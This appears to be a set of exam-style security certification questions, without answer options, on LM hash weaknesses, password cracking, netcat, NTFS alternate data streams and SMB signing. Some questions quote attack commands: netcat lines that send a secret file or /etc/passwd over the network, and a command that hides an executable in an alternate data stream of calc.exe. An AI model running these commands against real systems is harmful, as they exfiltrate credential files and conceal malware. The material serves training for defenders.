Windows LAN Manager (LM) hashes are known to be weak. Which of the following are known
weaknesses of LM? (Choose three)

You have retrieved the raw hash values from a Windows 2000 Domain Controller. Using social
engineering, you come to know that they are enforcing strong passwords. You understand that all
users are required to use passwords that are at least 8 characters in length. All passwords must
also use 3 of the 4 following categories: lower case letters, capital letters, numbers and special
characters.
With your existing knowledge of users, likely user account names and the possibility that they will
choose the easiest passwords possible, what would be the fastest type of password cracking
attack you can run against these hash values and still get results?

An attacker runs netcat tool to transfer a secret file between two hosts.
Machine A: netcat -l -p 1234 < secretfile
Machine B: netcat 192.168.3.4 > 1234
He is worried about information being sniffed on the network. How would the attacker use netcat to
encrypt the information before transmitting onto the wire?

What is GINA?

Fingerprinting an Operating System helps a cracker because:

In the context of Windows Security, what is a ‘null’ user?

What does the following command in netcat do?
nc -l -u -p55555 < /etc/passwd

What hacking attack is challenge/response authentication used to prevent?

What file system vulnerability does the following command take advantage of?
type c:\anyfile.exe > c:\winnt\system32\calc.exe:anyfile.exe

Attackers can potentially intercept and modify unsigned SMB packets, modify the traffic and
forward it so that the server might perform undesirable actions. Alternatively, the attacker could
pose as the server or client after a legitimate authentication and gain unauthorized access to data.
Which of the following is NOT a means that can be used to minimize or protect against such an
attack?